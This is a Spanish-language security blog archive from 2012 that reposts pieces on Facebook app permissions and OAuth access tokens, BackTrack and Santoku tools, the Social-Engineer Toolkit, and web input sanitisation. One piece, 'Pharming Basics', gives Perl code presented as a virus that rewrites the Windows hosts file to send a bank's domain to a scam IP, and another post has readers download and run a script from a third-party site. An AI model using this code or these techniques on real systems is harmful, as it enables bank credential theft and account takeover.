jueves, 23 de agosto de 2012

Microsoft cambia su logo; es la primera vez desde 1987

Microsoft, da a conocer su nuevo logo más colorido hoy jueves en la inauguración de la 23 ª tienda de Microsoft en Boston . También aparecerá el jueves en el Seattle Bellevue Microsoft, así como en la página web microsoft.com.

El nuevo logo, que incorpora un multicolor símbolo de Windows, además de su nombre "Microsoft" en letra sencilla, ligera, destinada a "señalar el futuro, novedad y frescura", dijo Jeff Hansen, gerente general de la estrategia de marca.

La compañía está preparando el lanzamiento de versiones nuevas o actualizadas de manera significativa de casi todos sus productos, desde Windows hasta Windows Phone para Office.

Los nuevos productos contará con un nuevo aspecto y sensación - más clara y con menos desorden y los diseños basados en azulejos más coloridos.

Fuente en español
Fuente en ingles (original)

miércoles, 22 de agosto de 2012

All the input is evil - I de III

Hoy, en uno de esos intentos por escribir algo que no solo tenga que ver con fallos de seguridad informática me decidí a escribir un post básico sobre las vulnerabilidades más comunes en aplicaciones web y como sanitizarlas.






Trataremos básicamente los principales fallos de una aplicación web que permiten a un atacante "operar" con determinado fin y finalidad.
Hace no mucho asistí (vía streaming tampoco os volvais locos) a una charla de mi amigo @chemaalonso cuyo título era "All the input is evil", lo cual viene a explicar que todos los datos de entrada en la aplicación son malignos.

La charla fue bastante amena y estoy seguro de que a partir de ahora cuando programeis una aplicación os acordareis del título e intentareis sanitizar y controlar al máximo los parámetros de entrada (aunque siempre hay algún cafre que antepone la funcionalidad a la seguridad). }:))

1. - Inyecciones SQL básicas.

Típico caso vulnerable: news.php?new=123


Sabemos (y el programador debe de saberlo) que el código anterior es vulnerable a sql injection. También si nos fijamos sabemos que siempre usamos un id numérico, ¿entonces?
Para mi el código anterior sanitizado sería:



En casos en donde el parámetro de entrada tiene que ser alfanumérico, debemos de hacerlo de la siguiente forma:



2. - Ataque XSS (Cross Site Scripting)

Otro típico caso es el buscador en donde se imprime la palabra que se introdujo en el textbox.




Y aquí el código corregido sanitizando los parámetros de entrada:




¿Fácil no? Pues pegaros una sesión de google hacking y vereis la cantidad de sitios que "pasan" de la seguridad.


All the input is evil - II de III
All the input is evil - III de III 

Fuente: http://www.seginformatica.net

martes, 21 de agosto de 2012

Aplicaciones de Facebook y Privacidad (2 de 3)

Tras leer la primera parte de este artículo, ahora que ya tenéis una pequeña idea de cómo funcionan las aplicaciones les invito a que prueben esta aplicación para Facebook y vean una muestra de los permisos que les dan a las aplicaciones.

Si el video te ha puesto los pelos de punta y os ha hecho reflexionar sobre toda la información que estas dejando de ti, entonces ni pensar en todas aquellas aplicaciones a las que les diste los permisos sin ver ni cuales eran, y mucho menos saber si eran confiables o no…

Si se fijan en la política de privacidad de ese sitio web,  en la parte de abajo hay unos escritos en ingles que dicen que es una aplicación solo para entretenimiento y que no guardaran tu información, etcétera, etcétera. Sin embargo, lo curioso de ese sito es que, si revisan el código de fuente de la aplicación Facebook, en una parte podemos observar lo siguiente:


Figura 4: El nombre de la aplicación Facebook se llama "El Colector"

No estoy afirmando que la aplicación almacene la información de las personas que la usen pero la verdad es que suena bastante sospechoso. Imagínense entonces lo que podría llegar a pasar si le dan todos los permisos a una aplicación diseñada por un malo de verdad, específicamente para robar datos de las personas a través de Facebook.

Si piensas que una vez dados los permisos, basta con quitárselos, estás un grave error. Y es que esa aplicación seguramente ya haya almacenado toda la información en un servidor y se acabó. Se fueron todos los datos a otro servidor que no tiene nada que ver con la infraestructura de Facebook o sus políticas de privacidad y seguridad. Eliminar una aplicación no significa que los datos que tomo mientras estabas usándola se borrarán de sus servidores.

De hecho, muchas de esas aplicaciones guardan los datos en servidores que tienen una dudosa seguridad, y es fácil encontrar en esos servidores fallos demasiado comunes y sencillos.  (Nota Maligna: De esto os publicaré en unos días un artículo con Silverhack sobre este tema)

Figura 5: App Facebook con SQLi, cortesía de Silverhack

Prosigo con lo que en realidad quería hablarles…

Como decía al principio, después de unas pruebas en la API de Facebook encontré algunas carencias de seguridad, especialmente debido a que Facebook gestiona todos los accesos mediante una URL que lleva todos los datos necesarios. Si le hemos dado los permisos a una aplicación y navegamos a una dirección URL que devuelva el “Access_token” obviamente no volverá a pedir los permisos. Por lo que queda almacenado en una  en esa URL tu Access_token al aire, por así decir,  y ya sabéis lo que se puede hacer con el.

Lo que puedo decir sobre esto, es que debéis fijaros en qué permisos dais a las aplicaciones y qué aplicaciones instaláis, si son o no confiables y en caso de haber instalado alguna borrarle los permisos concedidos.

Pero que pasaría si se pudiera generar un “Access_token” sin que le deis los permisos a la aplicación, que todos los permisos existentes se les den solos y que además no podáis quitar dicha aplicación. ¿Molaría verdad? No, la verdad es que no molaría, sino que mola porque tras realizar muchas pruebas pude comprobar que es posible hacer esto.

Si se configura bien un script bastaría con navegar a un sitio web malicioso para que te roben tu información personal, con solo ingresar y nada más. Para conseguir que entre en esa web, como truco de ingeniería social para robar la cuenta de quien sea  se podría usar, por ejemplo, un mensaje enviado a si mismo, que le cause curiosidad y al pinchar el enlace se terminó todo. Ya sabéis que dejar tal mensaje es pan comido, a través de la suplantación de identidad en Facebook, lo único que deberías saber su dirección de correo pero mucho mas fácil todavía.

Pero esto, será en la tercera y última parte del artículo, antes de que hagamos unas consultas previas...

Autor: Ariel Ignacio La Cono

*********************************************************************************
- Aplicaciones de Facebook y Privacidad (1 de 3)
- Aplicaciones de Facebook y Privacidad (2 de 3)
- Aplicaciones de Facebook y Privacidad (3 de 3)

Fuente: www.elladodelmal.com

Logran grabar 700 terabytes de información en un gramo de ADN



George Church y Sri Kosuri, científicos del Instituto Wyss de Harvard, escribieron una publicación científica donde explican su método para grabar 5.5 petabits de datos en moléculas de ADN. Para ello, sintetizaron tiras de ácido nucleico capaces de almacenar 96 bits usando sus bases hidrogenadas para representar un valor binario, donde la timina (T) y guanina (G) son el uno, y la adenina (A) y citosina (C) el cero.

Para leer la información grabada en el ADN éste se secuencia –como cuando se realizó con el genoma humano– y convierte la base ACGT en binario. Para ayudar a secuenciarlo, cada tira de ADN comienza con un bloque de direcciones de 19 bits que ordena la información.


Los científicos llevan bastante tiempo atentos a las capacidades del ADN para guardar información debido a su alta densidad (ya que cada base hidrogenada representa un bit y sólo tiene unos átomos de largo), porque es volumétrico más que plano e increíblemente estable, pues su degradación demora años.

Si bien secuenciar el ADN tarda sus buenas horas, no deja de ser impresionante que esa cantidad de información pueda ser guardada en sólo un gramo de peso, donde los científicos calcularon que para guardar los 5.5 petabits de información que lograron almacenar necesitarías 233 discos duros de 3 terabytes, que sumarían 151 kilos.

Fuente: http://www.fayerwayer.com/

Actualizaciones de backtrack en forma sencilla

BackTrack es una distribución GNU/Linux en formato LiveCD pensada y diseñada para la auditoría de seguridad y relacionada con la seguridad informática en general. Actualmente tiene una gran popularidad y aceptación en la comunidad que se mueve en torno a la seguridad informática.

¿Como podemos tener siempre BackTrack actualizado?
Existen numerosos scripts que facilitan el trabajo aunque ayer encontré uno muy interesante por su sencillez. Script.

Empezamos por descargar el script escrito Python, de la siguiente forma:
wget http://bl4ck5w4n.tk/wp-content/uploads/2011/07/bt5up.tar
 tar -xvf bt5up.tar
 Lanzamos el script
python bt5up.py
 Por último, solamente nos toca actualizar lo que deseemos.

Con este script mantener nuestro BackTrack actualizado es muy fácil.

Fuente:  www.seguridaddelmal.com

Actualizar BackTrack 5 R2 a BackTrack 5 R3


Todos aquellos que no deseen realizar una nueva instalación, pueden actualizar su versión R2 a R3 con 2 sencillos pasos que detallo en esta entrada. Información.

Esta nueva versión ofrece correcciones, actualizaciones de herramientas y unas 60 herramientas nuevas a  BackTrack. Por esas razones, lo mejor es tener nuestro BackTrack actualizado a R3.

Comenzamos, nos aseguramos que nuestra R2 este totalmente actualizada. Lo pueden hacer de la siguiente forma o bien leen esta entrada.
apt-get update && apt-get dist-upgrade
Finalizado el proceso, solamente queda la instalación de las nuevas herramientas que trae R3. Ahora toca elegir entre herramientas 32-Bit o 64-Bit, según la distribución que usemos de BackTrack.

32-Bit:
apt-get install libcrafter blueranger dbd inundator intersect mercury cutycapt trixd00r artemisa rifiuti2 netgear-telnetenable jboss-autopwn deblaze sakis3g voiphoney apache-users phrasendrescher kautilya manglefizz rainbowcrack rainbowcrack-mt lynis-audit spooftooph wifihoney twofi truecrack uberharvest acccheck statsprocessor iphoneanalyzer jad javasnoop mitmproxy ewizard multimac netsniff-ng smbexec websploit dnmap johnny unix-privesc-check sslcaudit dhcpig intercepter-ng u3-pwn binwalk laudanum wifite tnscmd10g bluepot dotdotpwn subterfuge jigsaw urlcrazy creddump android-sdk apktool ded dex2jar droidbox smali termineter bbqsql htexploit smartphone-pentest-framework fern-wifi-cracker powersploit webhandler
64-Bit:
apt-get install libcrafter blueranger dbd inundator intersect mercury cutycapt trixd00r rifiuti2 netgear-telnetenable jboss-autopwn deblaze sakis3g voiphoney apache-users phrasendrescher kautilya manglefizz rainbowcrack rainbowcrack-mt lynis-audit spooftooph wifihoney twofi truecrack acccheck statsprocessor iphoneanalyzer jad javasnoop mitmproxy ewizard multimac netsniff-ng smbexec websploit dnmap johnny unix-privesc-check sslcaudit dhcpig intercepter-ng u3-pwn binwalk laudanum wifite tnscmd10g bluepot dotdotpwn subterfuge jigsaw urlcrazy creddump android-sdk apktool ded dex2jar droidbox smali termineter multiforcer bbqsql htexploit smartphone-pentest-framework fern-wifi-cracker powersploit webhandler

Con estos 2 sencillos pasos, tennos R2 totalmente actualizado a R3 con todas las nuevas mejoras.


Fuente: http://www.seguridaddelmal.com

Santoku: distribución de seguridad para dispositivos móviles

Santoku es una distribución Linux basada en OWASP’s MobiSec especializada en pruebas de seguridad, análisis de malware y análisis forenses para teléfonos móviles, válida para dispositivos con Android, BlackBerry, iOS y Windows Phone.  

La versión Santoku Community Edition es un proyecto colaborativo para proveer un entorno Linux preconfigurado con utilidades, drivers y guías para este campo. La versión alpha puede ya descargarse:

Descarga (+3Gb): Santoku-0.1-alpha.iso
md5:54e48ea0cd133da04a1b55d4531e35bb

E incluye las siguientes herramientas:


Herramientas de desarrollo:
  • Android SDK Manager
  • Apple Xcode IDE
  • BlackBerry JDE
  • BlackBerry Tablet OS SDK
  • BlackBerry WebWorks
  • DroidBox
  • Eclipse IDE
  • Windows Phone SDK
  • Android 2.3.3, 3.2, and 4.0.3 Emulators
  • SecurityCompass Lab Server (HTTP and HTTPS)
  • BlackBerry Ripple
  • BlackBerry Simulators
Penetration Testing:
  • CeWL
  • DirBuster
  • Fierce
  • Nikto
  • nmap
  • Burp Suite
  • Mallory
  • w3af Console
  • w3af GUI
  • ZAP
  • BeEF
  • Ettercap
  • iSniff
  • Metasploit Console
  • Metasploit GUI
  • NetSed
  • SET
  • SQLMap
  • SSLStrip
Ingeniería inversa:
  • APK Tool
  • Dex2Jar
  • Flawfinder
  • Java Decompiler
  • Strace
Analizadores wireless:
  • Aircrack-ng
  • Kismet
  • Ubertooth Kismet
  • Ubertooth Spectrum Analyzer
  • Wireshark
Forense de dispositivos:
  • AFLogical Open Source Edition
  • Android Encryption Brute Force
  • BitPim
  • BlackBerry Desktop Manager
  • Foremost
  • iPhone Backup Analyzer
  • MIAT
  • Paraben Device Seizure
  • Sift Workstation
  • Sleuth Kit
  • SQLiteSpy
Infraestructura móvil:
  • BES Express
  • Google Mobile Management
  • iPhone Configuration Tool

     Fuente: http://www.hackplayers.com

miércoles, 15 de agosto de 2012

Aplicaciones de Facebook y Privacidad (1 de 3)

A finales del año pasado miraba como funcionan las aplicaciones de Facebook, y la verdad es que después de haber hecho unas pruebas en el Graph API para desarrolladores, como era de esperar,  la seguridad de Facebook vuelve a mostrar errores no deseable. La gente que tiene algo de conocimientos sobre como funcionan las Apps de Facebook en relación con nuestra información personal, sabrán que no es nada de otro mundo que obtengan acceso de forma fácil a ella - a nuestra información -, y los que no entienden mucho, ahora lo entenderéis.

Cada aplicación de Facebook requiere permisos de los usuarios para poder acceder a nuestra información y realizar ciertas acciones, los cuales algunos de esos permisos son necesarios para que funcione dicha aplicación. Los permisos que nos pueden pedir son variados y van desde publicar estados, fotos, acceder a nuestra fecha de cumpleaños, numero de celular hasta acceder a nuestra carpeta de mensajes privados, crear notas, eventos, agregar amigos y más.

Para ello, cuando entramos a una nueva aplicación, esta nos pide los permisos, los cuales la mayoría de la gente los acepta sin leerlos, como si instalaran un programa en el PC,  ya sabéis, le dan a aceptar antes de instalar. Solo aceptarlos basta para dejar expuesta nuestra información a la aplicación que la solicito. Interesante ¿no? Quiénes de los que están leyendo este articulo se quedo pensando ¿y para que cojones una aplicación querrá acceder a mis mensajes? O ¿crear eventos?

Aquí entran en juego las aplicaciones creadas por los tíos malos para robar datos. Como dije anteriormente estas te piden no solo un permiso, sino que te piden todos y tú se los das con dos o tres clics y luego a toda tu información es usada para venderlos al mercado negro, suplantar tu identidad, campañas de spam, marketing indeseable, etcétera, etcétera, etcétera. Permisos como crear eventos o notas son usados para distribuirse invitando a toda tu lista de contactos en campañas virales, así son mas las personas afectadas. Si entramos a alguna aplicación lo más probable es que aparezca un cartel parecido a éste:


Figura 1: Solicitud de permisos de una aplicación Facebook

Permisos de las aplicaciones Facebook

Ahí claramente podemos ver los permisos que pide la aplicación, una aplicación normal pide esos permisos y alguno que otro más. La dirección de la petición de permisos seria en un estilo estructurado así:

https://www.facebook.com/dialog/oauth?client_id={ID DE LA APLICACION}&redirect_uri={URL DE REDIRECCION}&scope={PERMISOS}
ID DE LA APLICACIÓN: Numero de identificación de la aplicación.
URL DE REDIRECCIÓN: Dirección URL establecida por la aplicación, se puede modificar pero solo con direcciones de servidores de Facebook o con la que la aplicación haya establecido, de lo contrario nos tirará un error.
PERMISOS: Son establecidos por la aplicación, se pueden modificar pero si les quitamos los permisos que nos pide puede que la aplicación no funcione correctamente.
La mayoría de las aplicaciones que hay dentro de Facebook funcionan con códigos de acceso (a nuestra información) denominados “access token”, de tal manera que cuando aceptamos los permisos se genera dicho código con el cual la aplicación es capaz de realizar distintas acciones según se lo hayamos permitido.

Si deseamos ver el código de acceso que la aplicación genera, hay que modificar la dirección de petición agregándole al final el tipo de respuesta y también modificar el “redirect_url” con algún servidor de Facebook o con la pagina definida por la aplicación. La estructura quedaría así:

https://www.facebook.com/dialog/oauth?client_id={ID DE LA APLICACIÓN}&redirect_uri={URL DE REDIRECCIÓN}/&scope={PERMISOS}&response_type=token

Si navegamos dicha URL, la aplicación nos pedirá los permisos que desea obtener y si los aceptamos se nos redireccionará a:

http://www.facebook.com/#access_token={CÓDIGO GENERADO}&expires_in={TIEMPO EN EL QUE EL CÓDIGO EXPIRARÁ}

Como verán, el código que se genera tiene un periodo para que expire. Es decir que se podrá usar ese código durante un cierto tiempo hasta que volvamos a generar otro. Si el tiempo en el que el código expira (“expires_in”) es igual a 0 entonces no expirará a menos que cambiemos nuestra contraseña o le quitemos los permisos a la aplicación. Para ver la aplicación, los permisos, el usuario, el tiempo de vencimiento, etcétera, de un código podemos utilizar el Debugger que Facebook ofrece a los desarrolladores.

Figura 2: Debugger de aplicaciones Facebook

Eliminación de una aplicación Facebook

Si ves que te has pillado una de esas aplicaciones que publican cada 2x3 con tu nombre y deseáis eliminarla podéis hacerlo así, desde la configuración de tu cuenta en https://www.facebook.com/settings/?tab=applications:

Figura 3: Eliminación de aplicación Facebook


Le dan clic a Editar, luego a Eliminar y listo. Si le dan a Editar, se les desplegara toda la información de lo que la aplicación puede hacer. Y como verán en la imagen en la parte de abajo muestra los últimos accesos en los que la aplicación hizo uso de nuestros datos.

¿Y estas cosas, se utilizan para hacer maldades? Lo vemos en la segunda parte del artículo.

Autor: Ariel Ignacio La Cono

- Aplicaciones de Facebook y Privacidad (1 de 3)
- Aplicaciones de Facebook y Privacidad (2 de 3)
- Aplicaciones de Facebook y Privacidad (3 de 3)

Pharming Basics by JosS


print "\t\t#################################################\n\n";
print "\t\t#        Pharming.txt - Spanish Hackers Team      #\n\n";
print "\t\t#                  by JosS                        #\n\n";
print "\t\t#################################################\n\n";



##Pharming.

Hola a todos!.

Hoy [21-9-07] me gustaría hablarles del pharming, principalmente de su uso y abuso.
Es una vulnerabilidad que reside en los servidores DNS, aquellos servidores que
transforman URLs a IPs. La vulnerabilidad tiene varios usos y muchos de ellos son
fines no legales, como puede ser el Phising, una de las prioridades de esta vuln.

Más que nada quiero enfocar este manual al uso práctico de virus creados para el robo
de credenciales.

##Hosts.

En todos los sistemas operativos, ya sean de particulares o empresas
poseen un archivo llamado 'hosts' en el se encuentran las URLs y las IPs a las que se
dirigen.
Si nosotros podemos escribir en ese archivo 'hosts' podríamos hacer que al entrar a
google.com fuera a www.zone-h.org. Veamos un ejemplo:

127.0.0.1 localhost

Esto quiere decir que localhost se resuelve como 127.0.0.1, es por ello por lo que cuando
ponemos localhost en nuestro navegador nos dirigimos a nuestra máquina.

##Rutas.

# Windows 95/98/Me: C:\Windows\Hosts
# Windows NT/2000: C:\WINNT\System32\drivers\etc
# Windows XP: C:\WINDOWS\system32\drivers\etc
# Windows 2003: C:\WINDOWS\system32\drivers\etc
# Windows Vista: C:\WINDOWS\system32\drivers\etc
# Unix (en general): /etc/hosts
# Linux (en general): /etc/hosts
# MacOS (en general): /etc/hosts

En esos directorios se encuetra un archivo llamado 'hosts'. El cual podemos modificar a
nuestro gusto.

##Code.

Si queremos crear un virus dedicado al robo de credenciales bancarias el uso de la técnica
Pharming nos dará muchos resultados.
Imaginemos que tenemos un Scam del 'Banco BBVA' en la IP = 85.235.65.99 y qeremos que la
víctima que a sido infectada por el virus al entrar a la web oficial del 'Banco BBVA',
redireccione a nuestro Scam. Para eso haríamos esto:

85.235.65.99 bbva.es

La programación del virus:

my $mensaje = "85.235.65.99 bbva.es";

$dir = ' C:\WINDOWS\system32\drivers\etc\hosts ';

open (HOSTS, ">>$dir");

print HOSTS $mensaje;



print "\t\t#################################################\n\n";
print "\t\t#      Pharming.txt - Spanish Hackers Team        #\n\n";
print "\t\t#                    by JosS                      #\n\n";
print "\t\t#################################################\n\n";

# spanish-hackers.com

martes, 14 de agosto de 2012

Extraer texto de imágenes escaneadas con Free Online OCR

Existen varios programas en linux (ocrfeeder, gscan2pdf o el mismo XSane con tesseract u otros motores gráficos…) que permiten reconocer texto de imágenes utilizando el proceso de reconocimiento óptico de caracteres OCR. Son programas efectivos, pero a veces para obtener buenos resultados requieren bastante configuración, así que si solo necesitamos extraer textos y convertirlos en archivo editables de forma ocasional, existen soluciones online que nos pueden sacar de un aprieto, de todas las que he probado, mi preferida es Free Online OCR.
Este servicio gratuito y sin necesidad de registro, permite convertir documentos escaneados, fotos y capturas de pantalla en documentos editables (incluyendo la función de busqueda e indexado en PDFs). Entre los formatos de entrada admitidos están: PDF, GIF, BMP, JPEG, TIFF o PNG que se pueden exportar a formatos: DOC, PDF, RTF y TXT.
Free Online OCR además detecta el tipo de fuente, incluso en los archivos con baja resolución como faxes o capturas de pantalla, y mantiene el formato original.

 Fuente:  http://lamiradadelreplicante.wordpress.com/

¡Disponible BackTrack 5 R3!


"Ha llegado el momento de renovar nuestro arsenal de herramientas de seguridad - BackTrack 5 R3 ha sido publicada. R3 se centra en la corrección de errores, así como en la adición de más de 60 nuevas herramientas - varias de las cuales fueron lanzadas en el BlackHat y la Defcon 2012. Se ha añadido toda una nueva categoría - "explotación física", que ahora incluye herramientas tales como el IDE y las librerías de Arduino, o la colección de payloads de Kautilya Teensy"...
http://www.backtrack-linux.org/backtrack/backtrack-5-r3-released/ 
BT5R3-GNOME-64.torrent (md5: 8cd98b693ce542b671edecaed48ab06d)
BT5R3-GNOME-32.torrent
(md5: aafff8ff5b71fdb6fccdded49a6541a0)
BT5R3-KDE-64.torrent
(md5: 981b897b7fdf34fb1431ba84fe93249f)
BT5R3-KDE-32.torrent
(md5: d324687fb891e695089745d461268576)
BT5R3-GNOME-32-VM.torrent
(md5: bca6d3862c661b615a374d7ef61252c5)

sábado, 4 de agosto de 2012

The Social-Engineer Toolkit

mas conocido como , es un conjunto de herramientas especialmente diseñadas para realizar ataques de en procesos de auditorias en seguridad, esta programado en por David Kennedy (), quien hace poco publicó su versión 3.0 con grandes cambios y por esta razón, decidimos que era momento de dedicarle un articulo a esta excelente herramienta dentro de nuestra comunidad.

SET The Social Engineer Toolkit

En este articulo exploraremos las principales opciones del The Social-Engineer Toolkit, ademas de las nuevas características que se incorporaron al SET en su versión 3.0:

Iniciando el The Social-Engineer Toolkit

SET es multiplataforma, y solo necesitamos tener instalado el interprete de Python para ejecutarlo y ejecutarlo con ./set o Python set en la carpeta donde lo tengamos guardado (las dependencias que no tengas, las descargará automáticamente).

SET  The Social Engineer Toolkit

Al iniciar el SET, lo primero que vemos es un menú que nos ofrece una gran cantidad de opciones para lanzar nuestro ataque de ingeniería social, desde la creación de correos fraudulentos, paginas que al visitarlas infecta tu maquina, archivos multimedia que permite obtener acceso al equipo de la víctima, la posibilidad de enviar correo masivo, crear un CD/DVD o memoria USB que infecte la maquina y hasta enviar mensajes de texto que nos ayude en nuestra tarea.

Sistema de Phishing en el The Social-Engineer Toolkit

El sistema de creación de phishing en el SET es bastante completo, nos permite generar automáticamente un sitio falso con el cual engañar a los destinatario o enviar enviar de forma masiva correos con adjuntos maliciosos que permiten el acceso remoto de su maquina.

SET 1 The Social Engineer Toolkit

Vector de Ataque Web en el The Social-Engineer Toolkit

SET también permite realizar ataques automáticos a un usuarios que ingrese (por medio de ingeniería social) a una dirección que tu le especifiques (ahora lograr esto es mucho mas fácil gracias a los acortadores de direcciones), SET se encarga de subir el servidor y realizar el ataque que le especifiques (un applet de java, ataques múltiples, o tabnabbing entre otros…) que te devolverá una shell en el equipo víctima.

SET 2 The Social Engineer Toolkit

Creación de Medios Infectados en el The Social-Engineer Toolkit

Permite crear un archivo que se conecte remotamente a nuestra maquina, ofreciéndonos una shell del sistema y se ejecute en el equipo remoto al introducirse una memoria/disco duro USB, o un disco DVD/CD aprovechando el “autorun” de windows .

SET 3 The Social Engineer Toolkit

Generar ejecutable con Payload en el The Social-Engineer Toolkit

SET también permite (con la ayuda de metasploit framework) generar un ejecutable que se conecte remotamente a nuestra maquina, una vez lo abran en la maquina víctima, permitiéndonos configurar una gran cantidad de shells, entre ellas la famosa meterpreter, shells ciegas de windows, shells remotas y todo esto para procesadores a 32 y 64Bits

SET 4 The Social Engineer Toolkit

Ataques por Correo en The Social-Engineer Toolkit

En esta completa suite para hacer ataques de ingeniería social, se incluye una sección especialmente dedicada al correo electrónico, permitiendo enviar correos falsos o desde una cuenta gmail, a una o muchas personas.

SET 5 The Social Engineer Toolkit

Ataques con dispositivos Personalizados en el The Social-Engineer Toolkit

Los dispositivos Teensy son todos aquellos aparatos en los que se ha utilizado la tableta programable Teensy en su elaboración, al ser altamente personalizable y programable se puede emplear en procesos de auditorias en seguridad como ya nos ha mostrado IronGeek en la defcon 18 y SET nos facilita la tarea al programar estos dispositivos, ofrecernos rutinas que al conectar un dispositivo de estos nos podría poner a bajar una aplicación externa o ingresar a un sitio especifico y aceptar un applet de java, infectandonos en el proceso.

SET 6 The Social Engineer Toolkit

Falsificando Mensajes de texto en el The Social-Engineer Toolkit

Uno de los vectores de ataques mas eficientes a los que tenemos acceso con el SET, es el de envío de SMS (mensajes de textos) falsos, con los que podemos suplantar el numero telefónico que envía el mensaje, haciéndole pensar al receptor que efectivamente esa persona es quien le ha escrito, también incluye una opción para el envío masivo de SMS, por lo que podríamos enviar el mensaje a un mayor numero de destinatarios sin problema (la posibilidad de envíos a teléfonos fuera de estados unidos, depende de la disponibilidad del servicio por parte de las empresas prestadoras SohoOS, Lleida.net, SMSGANG).

SET 7 The Social Engineer Toolkit

Actualizando Metasploit y The Social-Engineer Toolkit

El SET esta ligado fuertemente al metasploit Framework, ya que muchas de sus funcionalidades las saca de este, por tanto incluye la posibilidad de actualizarlo desde su propia interface, así como incluye un actualizador para el mismo (recomendable que lo hagas cada que inicies el programa).

SET 8 The Social Engineer Toolkit

Descargar el The Social-Engineer Toolkit

 Fuente: www.Dragonjar.org

sábado, 28 de julio de 2012

Backtrack 5 Tutorial / Curso en Español


Tutorial, gracias a p0pc0rninj4 usuario de nuestra comunidad, me entero de una iniciativa de la OMHE (Organización Mexicana de Hackers Éticos) dirigida por Héctor López en la que pretenden documentar las funcionalidades del nuevo 5 en español y por medio de video tutoriales.

, los video tutoriales son bastante claros y muy introductorios para quienes desean aprender a manejar esta excelente distribución enfocada en la seguridad informática.
De momento se han publicado algunos Backtrack 5 Tutorial, video tutoriales del Curso Backtrack 5 Online en español, mostrando las herramientas, algunos conceptos básicos y con cada actualización el nivel se irá incrementando.



En este capítulo 1 de Backtrack 5 Tutorial veremos:
 
En este capítulo 2 de Backtrack 5 Tutorial veremos:
  • Linux Networking (ifconfig,dhclient,arp,route)
  • Whois, DNS,Zenmap (Obtener objetivos)
  • Google Hacking
  • Wireshark para puertos conocidos (80,21,22,23,443)
 
En este capítulo 3 de Backtrack 5 Tutorial veremos:
  • Wireshark para puertos conocidos (80,21,22,23,443)
  • NMap varios. -sS -Pn
 
En este capítulo 4 de Backtrack 5 Tutorial veremos:
  • IP’s y puertos
  • Sockets
  • Netcat
  • Cryptcat
  • Ncat
 
En este capítulo 5 de Backtrack 5 Tutorial veremos:
  • Exploit
  • Payload
  • Shell
  • Metasploit
  • Metasploitable
 
En este capítulo 6 de Backtrack 5 Tutorial veremos:
  • Defensa
  • Buscador de rootkits
  • Malware Tricks
 
En este capítulo 7 de Backtrack 5 Tutorial veremos:
  • Malware
  • Trojans
  • Bind & Reverse
  • Procesos y Memoria
  • Rootkit DEMO
 
 En este capítulo 8 de Backtrack 5 Tutorial veremos:
  • SET
  • Reverse Meterpreter
  • Bypass Antivirus
  • Invisibilidad de un backdoor
 
En este capítulo 9 de Backtrack 5 Tutorial veremos:
  • Evilgrade
  • Dual ARP spoofing, el truco .sh
  • Whireshark analisis de DNS

Tan pronto publiquen nuevos Backtrack 5 Tutorial, actualizaré esta entrada.

Mas Información de los Backtrack 5 Tutorial:

Anuncio de p0pc0rninj4 en nuestra comunidad
Anuncio en la pagina de la OMHE

Fuente: www.Dragonjar.org